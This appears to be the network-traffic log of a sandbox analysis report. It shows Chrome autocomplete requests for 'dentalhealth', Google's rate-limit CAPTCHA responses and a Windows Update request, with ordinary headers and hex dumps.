                                                                                                                                      2024-04-24 10:13:07 UTC554INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 25 33 46 63 6c
                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fcl


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      17192.168.2.1649733142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:07 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      18192.168.2.1649734142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:08 UTC649OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=den&oit=1&cp=3&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      19192.168.2.1649735142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:08 UTC650OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dent&oit=1&cp=4&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      20192.168.2.1649736142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:08 UTC651OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=denta&oit=1&cp=5&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      21192.168.2.1649737142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:08 UTC652OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dental&oit=1&cp=6&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      22192.168.2.1649738142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:09 UTC655OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dentalhea&oit=1&cp=9&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      23192.168.2.1649739142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:09 UTC658OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dentalhealt&oit=1&cp=11&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      24192.168.2.1649740142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:09 UTC659OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dentalhealth&oit=1&cp=12&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:10 UTC2230INHTTP/1.1 302 Found
                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3Ddentalhealth%26oit%3D1%26cp%3D12%26pgcl%3D4%26gs_rn%3D42%26psi%3D8AFy-_Mu70iYE25H%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGLa2o7EGIjDb6fpxk0dLXDVk8WJr0pupjTzgtn2DD3wBHtk8PFlHz1XwjTnBxJ5yTl6nO3uNT40yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                      x-hallmonitor-challenge: CgwItrajsQYQwKebjgISBJoQaSQ
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-JbYsXO2XY0_IRyDzW3caUw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:10 GMT
                                                                                                                                      Server: gws
                                                                                                                                      Content-Length: 612
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Set-Cookie: 1P_JAR=2024-04-24-10; expires=Fri, 24-May-2024 10:13:10 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                      Set-Cookie: NID=513=WH66wzGHJu4s1nKrBVkPM2L2vQWcWCCWngHkPlpM1BtVdNX0U9GRRNwlyEfl7Qa2bHQ4K6assAfQRLUF-uDYI7nTB6qGQz8LTMk3OhS-7HJtdcCUrR7Puc1EQMZ8UsNNRgniZGjnb1bQwgq32Sl3SuzWTxulSY3FEl44qh4jXN4; expires=Thu, 24-Oct-2024 10:13:10 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:13:10 UTC612INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 25 33 46 63 6c
                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fcl


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      25192.168.2.1649741142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:10 UTC873OUTGET /sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3Ddentalhealth%26oit%3D1%26cp%3D12%26pgcl%3D4%26gs_rn%3D42%26psi%3D8AFy-_Mu70iYE25H%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGLa2o7EGIjDb6fpxk0dLXDVk8WJr0pupjTzgtn2DD3wBHtk8PFlHz1XwjTnBxJ5yTl6nO3uNT40yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:10 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:10 GMT
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Server: HTTP server (unknown)
                                                                                                                                      Content-Length: 3685
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:13:10 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 3f 63 6c 69 65 6e 74 3d 63 68 72 6f 6d 65 2d 6f 6d 6e
                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/complete/search?client=chrome-omn
                                                                                                                                      2024-04-24 10:13:10 UTC1255INData Raw: 22 3e 0a 20 20 49 6e 20 6f 72 64 65 72 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2c 20 70 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 6a 61 76 61 73 63 72 69 70 74 20 6f 6e 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 2e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27
                                                                                                                                      Data Ascii: "> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form'
                                                                                                                                      2024-04-24 10:13:10 UTC1255INData Raw: 78 3b 22 3e 0a 3c 62 3e 41 62 6f 75 74 20 74 68 69 73 20 70 61 67 65 3c 2f 62 3e 3c 62 72 3e 3c 62 72 3e 0a 54 68 69 73 20 6e 65 74 77 6f 72 6b 20 69 73 20 62 6c 6f 63 6b 65 64 20 64 75 65 20 74 6f 20 75 6e 61 64 64 72 65 73 73 65 64 20 61 62 75 73 65 20 63 6f 6d 70 6c 61 69 6e 74 73 20 61 62 6f 75 74 20 6d 61 6c 69 63 69 6f 75 73 20 62 65 68 61 76 69 6f 72 2e 20 54 68 69 73 20 70 61 67 65 20 63 68 65 63 6b 73 20 74 6f 20 73 65 65 20 69 66 20 69 74 27 73 20 72 65 61 6c 6c 79 20 61 20 68 75 6d 61 6e 20 73 65 6e 64 69 6e 67 20 74 68 65 20 72 65 71 75 65 73 74 73 20 61 6e 64 20 6e 6f 74 20 61 20 72 6f 62 6f 74 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 74 68 69 73 20 6e 65 74 77 6f 72 6b 2e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 66 6f 44
                                                                                                                                      Data Ascii: x;"><b>About this page</b><br><br>This network is blocked due to unaddressed abuse complaints about malicious behavior. This page checks to see if it's really a human sending the requests and not a robot coming from this network. <br><br><div id="infoD
                                                                                                                                      2024-04-24 10:13:10 UTC276INData Raw: 62 72 3e 55 52 4c 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 3f 63 6c 69 65 6e 74 3d 63 68 72 6f 6d 65 2d 6f 6d 6e 69 26 61 6d 70 3b 67 73 5f 72 69 3d 63 68 72 6f 6d 65 2d 65 78 74 2d 61 6e 73 67 26 61 6d 70 3b 78 73 73 69 3d 74 26 61 6d 70 3b 71 3d 64 65 6e 74 61 6c 68 65 61 6c 74 68 26 61 6d 70 3b 6f 69 74 3d 31 26 61 6d 70 3b 63 70 3d 31 32 26 61 6d 70 3b 70 67 63 6c 3d 34 26 61 6d 70 3b 67 73 5f 72 6e 3d 34 32 26 61 6d 70 3b 70 73 69 3d 38 41 46 79 2d 5f 4d 75 37 30 69 59 45 32 35 48 26 61 6d 70 3b 73 75 67 6b 65 79 3d 41 49 7a 61 53 79 42 4f 74 69 34 6d 4d 2d 36 78 39 57 44 6e 5a 49 6a 49 65 79 45 55 32 31 4f 70 42 58 71 57 42 67 77 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f
                                                                                                                                      Data Ascii: br>URL: https://www.google.com/complete/search?client=chrome-omni&amp;gs_ri=chrome-ext-ansg&amp;xssi=t&amp;q=dentalhealth&amp;oit=1&amp;cp=12&amp;pgcl=4&amp;gs_rn=42&amp;psi=8AFy-_Mu70iYE25H&amp;sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw<br></div></


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      26192.168.2.1649742142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:12 UTC660OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dentalhealths&oit=1&cp=13&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      27192.168.2.164974452.165.165.26443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:12 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=c9UsdYNfmbzDR9B&MD=kM2l1z7B HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                      2024-04-24 10:13:13 UTC560INHTTP/1.1 200 OK
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Expires: -1
                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                      ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                      MS-CorrelationId: eb41951b-e4e8-4a0d-8c35-6d398c7fec61
                                                                                                                                      MS-RequestId: b25a0395-59a2-4812-96aa-e4231cda7328
                                                                                                                                      MS-CV: e3AuQhjsHkOJefBC.0
                                                                                                                                      X-Microsoft-SLSClientCache: 2160
                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:13 GMT
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 25457
